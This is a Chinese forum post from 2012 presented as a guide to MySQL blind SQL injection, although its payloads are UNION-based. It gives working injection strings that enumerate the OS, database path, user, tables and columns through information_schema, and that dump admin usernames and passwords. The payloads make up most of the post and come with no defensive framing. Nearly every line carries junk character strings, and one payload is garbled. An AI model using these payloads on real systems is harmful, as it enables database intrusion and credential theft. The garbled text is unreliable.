本文介绍MYSQL盲注的一些语句和方法
' v) f7 A& `* {( w$ {4 ? p8 B* s' O k+ {# |7 p7 C* |. C
学习盲注前先了解下 IFORMATION_SCHEMA 库
. W0 X6 u! E: b7 `( H
! g- t( f3 W) r. UMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有, c$ H! b- j1 R- ^* E
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
& q: o6 r# k- B4 D Z1.得到所有数据库名:6 |1 g2 g* v' I4 L
|SCHEMATA ->存储数据库名的表
+ j( b \" s8 k4 [% S- n0 I: `, A|---字段:SCHEMA_NAME ->数据库名称
, a* z7 ]) \1 H& ^- F6 @
# k9 S3 c% g$ H2 ?|TABLES ->存储表名- C5 ~! [) P5 F$ ], ]& e
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名7 k. m+ ^$ y: n/ Y; U3 S u2 Z
|---字段:TABLE_NAME ->存储表的表名0 n4 `7 T2 a& p6 g! M1 T
9 V8 L% N' q0 L7 f7 u5 ^) a) L|COLUMNS ->存储的字段名表
k0 c- {7 `' f2 Q2 U|---字段:TABLE_SCHEMA ->该字段所属数据库名
: ?$ y8 i, ~+ |6 u6 b: ?! N q) V, D$ l|---字段:TABLE_NAME ->存储所属表的名称
2 L0 z% q( }6 [* [$ \. ~2 w
" _: r: B. s0 e( p$ x# o" y|---字段:COLUMN_NAME ->该字段的名称' i# n/ O+ G( D
g( ~6 i. p5 E- G4 z+ K 2 i3 N2 X, h3 c5 W4 E' @/ q
3 r5 d& n; Y7 a1 e% Z$ j###########################################################################
; x- L( d# ~8 V' W: k
. q+ {" G" J6 g5 a9 S0x001 获取系统信息:
/ x2 U6 D. G e/ p# N
7 \) U. x3 s. r8 u+ k, _union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*/ q/ Z X0 G( ~
1 ]3 b0 ^: B( O! k. m/*0 z; l+ Y* A' K$ c& a8 C0 r
O2 Y9 j" F: v* _# Z@@global.version_compile_os 获取系统版本3 i, a. ^" _' p9 D
8 s/ a8 ~" F# F+ U& A@@datadir 数据库路径* f& p- L3 F7 }! ~' q) W0 M
database() 当前数据库名称( I( \( ^; p2 l/ Y/ x( k0 }# @. ~3 c5 d5 D
0x3c62723e 换行HEX值% `" J( c L# t1 x( N+ ]3 ^
2 I: a1 |+ `! G: S/ v9 a8 @4 Z
*/8 m9 R# Q- k2 f2 y
2 ]6 z7 O: K$ k
/ U4 W% s2 ?& h% p- k' w
8 ^5 P" Q2 a9 R1 i% t, M######################################################################% f7 J5 q( c% j2 T( k
h9 D7 `; L* B" }- f! Q
0x002 获取表名5 Y1 l4 r* p7 d) ^2 M2 e
, i/ f2 \: W" n1 e' u
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /* O8 @1 d1 @- ~8 m4 a* e
9 N8 H$ v; t! W6 S* X 5 ~( S! n% s! S1 @/ X- u
( r) n) K+ ^4 M, k$ s
/*' h8 [- v) i) f' B' w$ T
% _+ [1 J2 R/ G% E; X- |( P0x67617264656e 为当前数据库名
/ ?, |! @' A; u6 W+ Q0 r( s1 k9 R- m3 O" D4 U
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
8 C2 R- x7 J4 }9 p; ^0 B' k! l# n5 G9 ]4 T" @$ e. Q8 ^" c
*/) B/ a& U/ J, o [* X" O- p; g- r
0 ~% [' r+ L# p$ Y" ]* u3 p######################################################################/ {. z" R7 \5 M
2 H( S8 F) l$ N" \4 C8 w. L. ?
- ~% t: [; L( N2 H% X& O ^/ v! ?& t: E2 `: a: k
0x003 获取字段
7 o! P& o: [/ n# x/ ~% Z4 ~3 z1 S! E! m9 X2 ^& L
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
) J2 w( R/ p9 }# a+ L Q) q0 A
0 H7 J4 T% W( C7 E8 e) R/*$ ^, U }# t+ X& W7 e$ x/ K, Z
8 g9 g I. U' M# A
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
: m3 N2 N3 s" R7 b4 X; G2 |4 F& m9 j0 Y+ ?
0x61646d696e ->选择一个表
2 n% _$ J: Z2 u5 D" G; \5 f# Q: h% ]7 P8 R% |
0x67617264656e ->数据库名& u- U5 p! p5 O* p$ s" N7 Y" O
0 L7 o: T$ z. s; \: O*/
2 L( W1 w$ O+ ?" g* Y2 m( x0 s6 b; J+ g6 q% t; f
#####################################################################
! |- h9 J* i; X0 `8 `9 D
# `' {' r' E$ F1 _* n5 z2 g% z # _- o; b6 {0 c3 U% E8 n
6 p% n, F7 a3 o) ~, E) c5 L+ f; c
0x004 获取数据
4 \) c1 r% L) K
5 s- v E+ A6 J7 h1 E3 punion select 1,2,3
9 w$ J, b% n$ X, S,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin, e" Q' v- o& n( R+ g% e
0 u* P& Y/ f! N
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
, k6 E6 r4 S, n* l* s! G2 O% F# ], m) h2 ]. ]2 @
. `; E: [5 [, e" J, h( o
! A+ g: v8 K f: q5 h/*+ j. d$ p/ o" r. G( e) C
7 i% w6 |/ C2 Z& F8 ^0x3c62723e 换行符号HEX编码
! y) @# B9 i4 C- s! |8 ]% b9 `% _
- D# k' ^+ Q/ ^% ^' A/ c' Kgroup_concat 同时获得该字段所有数据
; u2 J1 @) W% X% d& x9 J0 h
( B' X, i8 X, n8 J7 p% k*/ ]1 e: U' R& w9 Y9 z
3 i$ Q2 S ^: H, I# \ |
发表于 2012-9-13 17:48:44
收藏
支持
反对